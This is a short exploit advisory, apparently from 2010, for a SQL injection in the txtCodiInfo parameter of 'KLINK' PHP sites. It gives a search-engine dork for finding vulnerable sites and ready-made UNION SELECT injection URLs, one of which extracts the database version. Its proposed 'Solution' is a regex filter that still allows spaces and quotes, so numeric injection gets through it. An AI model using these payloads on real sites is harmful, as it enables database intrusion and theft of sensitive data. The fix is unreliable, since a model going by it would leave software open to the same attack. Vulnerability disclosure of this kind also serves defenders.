##########################[Andr�s G�mez]################################ > # Exploit Title : KLINK Sql Injection Vulnerability > # Date : 2010-12-31 > # Author : Andr�s G�mez > # Software Developed by : http://www.contacto.com > # Contact : gomezandres@adinet.com.uy > # Dork : "allinurl:*.php?txtCodiInfo=" > ######################################################################## > # An attacker may execute arbitrary SQL statements on the vulnerable > system. > #This may compromise the integrity of your database and/or expose sensitive > information. > ######################################################################## > # Example 1: http://site.tld/path/interna.php?txtCodiInfo=' > # Example 2: > http://site.tld/path/interna.php?txtCodiInfo=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10-- > # Example 3: > http://site.tld/path/interna.php?txtCodiInfo=2+and+1=0+union+select+1,2,3,@@version,5,6,7,8,9,10-- > ######################################################################## > # Malicious users may inject SQL querys into a vulnerable > # application to fool a user in order to gather data from them or see > sensible information. > ######################################################################## > # Solution: > # $_GET = preg_replace("|([^\w\s\'])|i",'',$_GET); > # $_POST = preg_replace("|([^\w\s\'])|i",'',$_POST); > # Add them to your template index.php after the first ######################################################################## > # Special Thanks : HYPERNETHOST & Mauro Rossi > ##########################[Andr�s G�mez]################################ > > > -- > *Andr�s G�mez* > -- Director -- >